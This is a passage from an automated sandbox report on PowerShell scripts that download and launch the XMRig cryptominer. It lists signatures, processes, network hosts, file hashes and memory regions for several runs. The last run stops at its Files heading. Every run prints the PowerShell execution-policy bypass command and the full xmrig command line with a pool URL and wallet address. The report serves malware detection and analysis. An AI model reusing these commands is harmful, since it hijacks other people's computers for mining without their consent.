Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

150s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/5064-0-0x00007FF933803000-0x00007FF933805000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cu0zunra.hpy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5064-10-0x000002473C6E0000-0x000002473C702000-memory.dmp

memory/5064-11-0x00007FF933800000-0x00007FF9342C1000-memory.dmp

memory/5064-12-0x00007FF933800000-0x00007FF9342C1000-memory.dmp

memory/5064-14-0x00007FF933800000-0x00007FF9342C1000-memory.dmp

memory/5064-15-0x0000024754BD0000-0x0000024754BE2000-memory.dmp

memory/5064-16-0x000002473C760000-0x000002473C76A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5084-47-0x0000029C24650000-0x0000029C24670000-memory.dmp

memory/5084-48-0x0000029C24690000-0x0000029C246B0000-memory.dmp

memory/5084-49-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5064-50-0x00007FF933803000-0x00007FF933805000-memory.dmp

memory/5084-51-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5064-52-0x00007FF933800000-0x00007FF9342C1000-memory.dmp

memory/5084-54-0x0000029C246E0000-0x0000029C24700000-memory.dmp

memory/5084-53-0x0000029C246C0000-0x0000029C246E0000-memory.dmp

memory/5064-55-0x00007FF933800000-0x00007FF9342C1000-memory.dmp

memory/5084-56-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-57-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-58-0x0000029C246C0000-0x0000029C246E0000-memory.dmp

memory/5084-59-0x0000029C246E0000-0x0000029C24700000-memory.dmp

memory/5084-60-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-61-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-62-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-63-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-64-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-65-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-66-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-67-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

memory/5084-68-0x00007FF7CD3B0000-0x00007FF7CDFE3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240508-en

Max time kernel

149s

Max time network

113s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 52.111.227.14:443 tcp

Files

memory/4648-0-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp

memory/4648-1-0x000001DE9E570000-0x000001DE9E592000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j51b3il4.lu5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4648-10-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/4648-11-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/4648-12-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/4648-15-0x000001DE9E5E0000-0x000001DE9E5EA000-memory.dmp

memory/4648-14-0x000001DE9E600000-0x000001DE9E612000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4920-46-0x000002A928C70000-0x000002A928C90000-memory.dmp

memory/4920-47-0x000002A928CC0000-0x000002A928CE0000-memory.dmp

memory/4920-48-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4648-49-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp

memory/4648-50-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/4920-52-0x000002A92A5A0000-0x000002A92A5C0000-memory.dmp

memory/4920-53-0x000002A92A5C0000-0x000002A92A5E0000-memory.dmp

memory/4920-51-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4648-54-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp

memory/4920-55-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-56-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-57-0x000002A92A5A0000-0x000002A92A5C0000-memory.dmp

memory/4920-58-0x000002A92A5C0000-0x000002A92A5E0000-memory.dmp

memory/4920-59-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-60-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-61-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-62-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-63-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-64-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-65-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-66-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-67-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

memory/4920-68-0x00007FF7B8690000-0x00007FF7B92C3000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

142s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1320,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4036 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp

Files

memory/1832-0-0x00007FFCBC053000-0x00007FFCBC055000-memory.dmp

memory/1832-1-0x0000025EEE410000-0x0000025EEE432000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y0s3nb42.gpg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1832-11-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/1832-12-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/1832-14-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/1832-16-0x0000025EEE580000-0x0000025EEE58A000-memory.dmp

memory/1832-15-0x0000025EEE900000-0x0000025EEE912000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1000-47-0x00000183B7A30000-0x00000183B7A50000-memory.dmp

memory/1000-48-0x0000018449FF0000-0x000001844A010000-memory.dmp

memory/1832-50-0x00007FFCBC053000-0x00007FFCBC055000-memory.dmp

memory/1832-51-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/1000-49-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-52-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-55-0x000001844A660000-0x000001844A680000-memory.dmp

memory/1000-54-0x000001844A430000-0x000001844A450000-memory.dmp

memory/1832-53-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/1000-56-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1832-57-0x00007FFCBC050000-0x00007FFCBCB11000-memory.dmp

memory/1000-58-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-59-0x000001844A430000-0x000001844A450000-memory.dmp

memory/1000-60-0x000001844A660000-0x000001844A680000-memory.dmp

memory/1000-61-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-62-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-63-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-64-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-65-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-66-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-67-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-68-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

memory/1000-69-0x00007FF716E40000-0x00007FF717A73000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

141s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 136.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/5036-2-0x00007FFDC0CF3000-0x00007FFDC0CF4000-memory.dmp

memory/5036-5-0x000001698A4A0000-0x000001698A4C2000-memory.dmp

memory/5036-9-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp

memory/5036-8-0x00000169A2D00000-0x00000169A2D76000-memory.dmp

memory/5036-18-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dksx1nmy.m3s.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5036-25-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp

memory/5036-61-0x00000169A2960000-0x00000169A296A000-memory.dmp

memory/5036-48-0x00000169A2CA0000-0x00000169A2CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 c049987621b2b9e250bde4e494d506a2
SHA1 b6f65999a0ac4d47809450b355f94339e45484ee
SHA256 17b112c6e99da033dc4b3e3342b808347535558f138917486c86df7ce87153cf
SHA512 357b629f3b691021da352dfb04d9867b657eaba6896f4fd6c21ff8f06ffc33f08b56256084352e2e1ffcf651cf95ee2a5bf4cbb728854cdd09d1b1f55a101a7e

memory/4184-90-0x000001322B210000-0x000001322B230000-memory.dmp

memory/4184-91-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/5036-92-0x00007FFDC0CF3000-0x00007FFDC0CF4000-memory.dmp

memory/5036-94-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp

memory/4184-93-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/5036-95-0x00007FFDC0CF0000-0x00007FFDC16DC000-memory.dmp

memory/4184-96-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-97-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-98-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-99-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-100-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-101-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-102-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-103-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-104-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-105-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

memory/4184-106-0x00007FF7BE510000-0x00007FF7BF143000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240508-en

Max time kernel

145s

Max time network

155s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

